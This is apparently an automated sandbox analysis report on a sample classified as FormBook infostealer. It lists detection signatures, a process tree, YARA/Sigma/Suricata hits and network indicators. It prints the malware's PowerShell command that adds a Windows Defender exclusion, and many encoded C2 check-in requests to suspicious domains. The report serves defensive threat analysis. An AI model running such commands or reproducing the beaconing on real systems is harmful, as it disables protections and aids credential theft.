Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO 1202495088.exe

Overview

General Information

Sample name:PO 1202495088.exe
Analysis ID:1574077
MD5:49095d080a201256f23914317e65ef4b
SHA1:6e5d17981778ab6e6929b486d1db0ee538ba4f10
SHA256:168f3f67fdf19ef0a0afabb378ee803fb3cf1f822ad37ba51772bc96a58a83d0
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • PO 1202495088.exe (PID: 3264 cmdline: "C:\Users\user\Desktop\PO 1202495088.exe" MD5: 49095D080A201256F23914317E65EF4B)
    • powershell.exe (PID: 5408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • PO 1202495088.exe (PID: 1124 cmdline: "C:\Users\user\Desktop\PO 1202495088.exe" MD5: 49095D080A201256F23914317E65EF4B)
      • RAVCpl64.exe (PID: 7500 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • cttune.exe (PID: 7748 cmdline: "C:\Windows\SysWOW64\cttune.exe" MD5: E515AF722F75E1A5708B532FAA483333)
          • firefox.exe (PID: 5316 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • svchost.exe (PID: 7792 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: F586835082F632DC8D9404D83BC16316)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1464570904.0000000001320000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000D.00000002.5166449084.0000000004810000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000D.00000002.5166555178.0000000004860000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          Process Memory Space: PO 1202495088.exe PID: 3264JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.PO 1202495088.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.PO 1202495088.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 1202495088.exe", ParentImage: C:\Users\user\Desktop\PO 1202495088.exe, ParentProcessId: 3264, ParentProcessName: PO 1202495088.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe", ProcessId: 5408, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 1202495088.exe", ParentImage: C:\Users\user\Desktop\PO 1202495088.exe, ParentProcessId: 3264, ParentProcessName: PO 1202495088.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe", ProcessId: 5408, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 1202495088.exe", ParentImage: C:\Users\user\Desktop\PO 1202495088.exe, ParentProcessId: 3264, ParentProcessName: PO 1202495088.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe", ProcessId: 5408, ProcessName: powershell.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 896, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7792, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T21:54:58.180357+010028563181A Network Trojan was detected192.168.11.2049728103.106.67.11280TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: PO 1202495088.exeAvira: detected
                Multi AV Scanner detection for submitted file
                Source: PO 1202495088.exeReversingLabs: Detection: 50%
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.PO 1202495088.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.PO 1202495088.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1464570904.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.5166449084.0000000004810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.5166555178.0000000004860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Machine Learning detection for sample
                Source: PO 1202495088.exeJoe Sandbox ML: detected
                Source: PO 1202495088.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PO 1202495088.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: PO 1202495088.exe, 00000001.00000002.1121146600.00000000708AB000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: PO 1202495088.exe, 00000001.00000002.1121146600.00000000708AB000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: cttune.pdb source: PO 1202495088.exe, 00000004.00000002.1463903866.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cttune.pdbGCTL source: PO 1202495088.exe, 00000004.00000002.1463903866.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.pdb source: PO 1202495088.exe, 00000001.00000002.1129772033.0000000070A8B000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdb source: PO 1202495088.exe, 00000001.00000002.1121146600.00000000708AB000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO 1202495088.exe, 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1466694539.00000000047E5000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1462966186.0000000004631000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdb source: PO 1202495088.exe, 00000001.00000002.1129772033.0000000070A8B000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: wntdll.pdb source: PO 1202495088.exe, PO 1202495088.exe, 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, cttune.exe, 0000000D.00000003.1466694539.00000000047E5000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1462966186.0000000004631000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdbRSDS source: PO 1202495088.exe, 00000001.00000002.1129772033.0000000070A8B000.00000020.00000001.01000000.00000006.sdmp
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4x nop then jmp 075FA047h1_2_075F96CC
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4x nop then jmp 075FA047h1_2_075F9B9D
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h12_2_0069B4E8
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 4x nop then mov ebx, 00000004h13_2_04CE04E8
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then mov ebx, 00000004h14_2_0000020832DDC4E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.11.20:49728 -> 103.106.67.112:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.tabyscooterrentals.xyz
                Source: DNS query: www.furrcali.xyz
                Source: Joe Sandbox ViewIP Address: 194.9.94.86 194.9.94.86
                Source: Joe Sandbox ViewIP Address: 76.223.54.146 76.223.54.146
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: global trafficHTTP traffic detected: GET /4wxo/?Hsa=KVXAK1dJ22EyzD&Sb=AuCk/wTI7zW3ld/u5VGEHIK6Kt0n3LR9prPfFK+Yc5xTqeXBXJi84rbX4QtnNLSqr4pLPSODfOM24Q7oPb8nuPFT6GxcogJfnF2+8lDPhEW1adutoQ/De7w= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.tabyscooterrentals.xyzUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /2j93/?Hsa=KVXAK1dJ22EyzD&Sb=Vzef3oWXaGELtgURWqqFi05KJy99TvY3Ax3n2w42PW1Tdv5T/46T0veVyj66+7X9h8HGTeoaGJDhn+MaRcWt91HqjtPUKRqQAZTb/tezorVLLvQhzmVaw3M= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.milp.storeUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /emhd/?Sb=Y3wtcJEoAby1p+bk3zYE+S80u8VCADM8sIJ2uwsESb9JsS+UnBQfnVhf+jS3LtVrLL+QWmPwAmdepwRhozi7BsCDIfZRcDeIjksRC4QWquR1OPmKeFcOon4=&Hsa=KVXAK1dJ22EyzD HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.vavada-official.buzzUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /1lpi/?Hsa=KVXAK1dJ22EyzD&Sb=XO6lNaUCtrQGcU2USTPm7AFH+ym41S/sd9ytkxpugSckEiM1CKodZjEVrjBa4PsrlwO68eKRpavYImQlE0qw0gJ/mieYbLr4KLMXJAig3t9gV+Ck/1h1VB8= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.jyshe18.buzzUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /86f0/?Sb=PuKikXorY4oo6Pd4yxwUW5NofTFUIXhFjDlOX4M2s/L5J9SfDLPGQlnn7RwJ6yyFAuMFatCqAdXGLq9bXHIsbHEK0zn8CXVXTea1ExwfCjX9qoJAsvLL/QI=&Hsa=KVXAK1dJ22EyzD HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.furrcali.xyzUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /f9au/?Hsa=KVXAK1dJ22EyzD&Sb=QRtPaBdQsqikqwtJ+Gac0NMmk/tHNWofn17hwciKQcyaSPo61+Z774QFVZQUbpc3NkgC7R9n74G00WikgwdAmD1VZwNHYhXmg3kBj5ds5wl7WitTMr5RZVw= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.activeusers.techUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /b4eq/?Sb=2bz2A+/Foq3BfYH3nkBAyBiQIN6vyGxA4CsyDuG2uzWi6t8+qfWmEOSu1g9JXJzNDc3HOGTjteURa686/52bGvnFkZWUI+XcrzebZPERH7tGcGhGffP7RzY=&Hsa=KVXAK1dJ22EyzD HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.unlimitu.websiteUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /tp8k/?Hsa=KVXAK1dJ22EyzD&Sb=Wzx2iIlwW+94es3u4Lo0FS74KiXnatT9p9we6G2JYq0Bn2uTvRtkednmI39Cm2I2dBYZfF7KG0N4DZZkU64bjEcb6QrTm/GIaTVemQQoPiAr/pRWHyNTKL8= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.sob.ripUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /b9be/?Sb=9OtV3uwQRtibrVA4hLtUEhtAbrgSLeETN2Bs+yR1Dw7urrZ54AC3m2EUc6XgmT690RzFqG8rClBthhFIppTUTpiMaaqCJj4lBnElnRAnP0SDGQ+vlziE68E=&Hsa=KVXAK1dJ22EyzD HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.blockconnect.techUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /1w6c/?Hsa=KVXAK1dJ22EyzD&Sb=6in00ENShVrGnKChmbChIXNbgO3p2TpRxDoWlxyauu1a14sApsVuao58PKEy9ZfMqdeygU8jDVXPCne7mQVbEOArj0ZOnhNCf8Kk2mpmREY64SemV0EG5N4= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.guilda.proUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /f7zl/?Sb=JpVDbrUZlDTgo68GijwbXUpM20WTl/lO5ke29OZx5ZiPNIs3iQFHoOZPOWsCnUoFoD4OWghDdoQd24qIggPhoo7R/zvFzJ3VTGAfqCgLISGEH/s3DM2hN/E=&Hsa=KVXAK1dJ22EyzD HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.shandongyb.topUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /ivn4/?Hsa=KVXAK1dJ22EyzD&Sb=dMAQ+cXbzFKaj3/VQV3ARRE/+V/pDaMde5ltK60scu7oomHWLUNrXeVoeNmDAD713TgV67ncuzdzcshVShA4O3nj+t7UnCG15p0qDWw9jP76vMR/2Muxc8U= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.augier2619.topUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /kr0d/?Sb=bP6k54Oj/dVpOGyx/646OsJjlk1Lh7hM6WHpc10dBI59rbtyQ+CUKzevm31jgUF3ujuXywFddjnVFrAf6vJCnEwCXj5JR8KMKpXq1B6p4R6mvtq3C4oxnko=&Hsa=KVXAK1dJ22EyzD HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.outandaboutatlanta.netUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /vhgo/?Hsa=KVXAK1dJ22EyzD&Sb=24NXdzG92oIiABHGu+ZQYkyVF3qsciAedndbjTecmy5pPhoyKbgcfd6NskqGmv23pLlxGGuv/szdXq+lWCLQY91EK5mjTLpxoUkNmweSZk21XKSgURGmp20= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.bonheur.techUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /5juh/?Sb=fBnyqhzI58/0qqn5K0IHu1zVTzK5FlfyZRuzvxuqSvPnsbI29xaXWUSjgesV5KpSdxDguhZQGIO0bb0sj0YKl6QMA8RyIBjzU5arC02cubFE1HnMLxW3shs=&Hsa=KVXAK1dJ22EyzD HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.inbulkses.shopUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /4wxo/?Hsa=KVXAK1dJ22EyzD&Sb=AuCk/wTI7zW3ld/u5VGEHIK6Kt0n3LR9prPfFK+Yc5xTqeXBXJi84rbX4QtnNLSqr4pLPSODfOM24Q7oPb8nuPFT6GxcogJfnF2+8lDPhEW1adutoQ/De7w= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.tabyscooterrentals.xyzUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /2j93/?Hsa=KVXAK1dJ22EyzD&Sb=Vzef3oWXaGELtgURWqqFi05KJy99TvY3Ax3n2w42PW1Tdv5T/46T0veVyj66+7X9h8HGTeoaGJDhn+MaRcWt91HqjtPUKRqQAZTb/tezorVLLvQhzmVaw3M= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.milp.storeUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /emhd/?Sb=Y3wtcJEoAby1p+bk3zYE+S80u8VCADM8sIJ2uwsESb9JsS+UnBQfnVhf+jS3LtVrLL+QWmPwAmdepwRhozi7BsCDIfZRcDeIjksRC4QWquR1OPmKeFcOon4=&Hsa=KVXAK1dJ22EyzD HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.vavada-official.buzzUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /1lpi/?Hsa=KVXAK1dJ22EyzD&Sb=XO6lNaUCtrQGcU2USTPm7AFH+ym41S/sd9ytkxpugSckEiM1CKodZjEVrjBa4PsrlwO68eKRpavYImQlE0qw0gJ/mieYbLr4KLMXJAig3t9gV+Ck/1h1VB8= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.jyshe18.buzzUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /86f0/?Sb=PuKikXorY4oo6Pd4yxwUW5NofTFUIXhFjDlOX4M2s/L5J9SfDLPGQlnn7RwJ6yyFAuMFatCqAdXGLq9bXHIsbHEK0zn8CXVXTea1ExwfCjX9qoJAsvLL/QI=&Hsa=KVXAK1dJ22EyzD HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.furrcali.xyzUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /f9au/?Hsa=KVXAK1dJ22EyzD&Sb=QRtPaBdQsqikqwtJ+Gac0NMmk/tHNWofn17hwciKQcyaSPo61+Z774QFVZQUbpc3NkgC7R9n74G00WikgwdAmD1VZwNHYhXmg3kBj5ds5wl7WitTMr5RZVw= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.activeusers.techUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /b4eq/?Sb=2bz2A+/Foq3BfYH3nkBAyBiQIN6vyGxA4CsyDuG2uzWi6t8+qfWmEOSu1g9JXJzNDc3HOGTjteURa686/52bGvnFkZWUI+XcrzebZPERH7tGcGhGffP7RzY=&Hsa=KVXAK1dJ22EyzD HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.unlimitu.websiteUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /tp8k/?Hsa=KVXAK1dJ22EyzD&Sb=Wzx2iIlwW+94es3u4Lo0FS74KiXnatT9p9we6G2JYq0Bn2uTvRtkednmI39Cm2I2dBYZfF7KG0N4DZZkU64bjEcb6QrTm/GIaTVemQQoPiAr/pRWHyNTKL8= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.sob.ripUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficDNS traffic detected: DNS query: www.tabyscooterrentals.xyz
                Source: global trafficDNS traffic detected: DNS query: www.ftaane.net
                Source: global trafficDNS traffic detected: DNS query: www.milp.store
                Source: global trafficDNS traffic detected: DNS query: www.vavada-official.buzz
                Source: global trafficDNS traffic detected: DNS query: www.jyshe18.buzz
                Source: global trafficDNS traffic detected: DNS query: www.furrcali.xyz
                Source: global trafficDNS traffic detected: DNS query: www.activeusers.tech
                Source: global trafficDNS traffic detected: DNS query: www.unlimitu.website
                Source: global trafficDNS traffic detected: DNS query: www.sob.rip
                Source: global trafficDNS traffic detected: DNS query: www.blockconnect.tech
                Source: global trafficDNS traffic detected: DNS query: www.guilda.pro
                Source: global trafficDNS traffic detected: DNS query: www.shandongyb.top
                Source: global trafficDNS traffic detected: DNS query: www.augier2619.top
                Source: global trafficDNS traffic detected: DNS query: www.outandaboutatlanta.net
                Source: global trafficDNS traffic detected: DNS query: www.bonheur.tech
                Source: global trafficDNS traffic detected: DNS query: www.inbulkses.shop
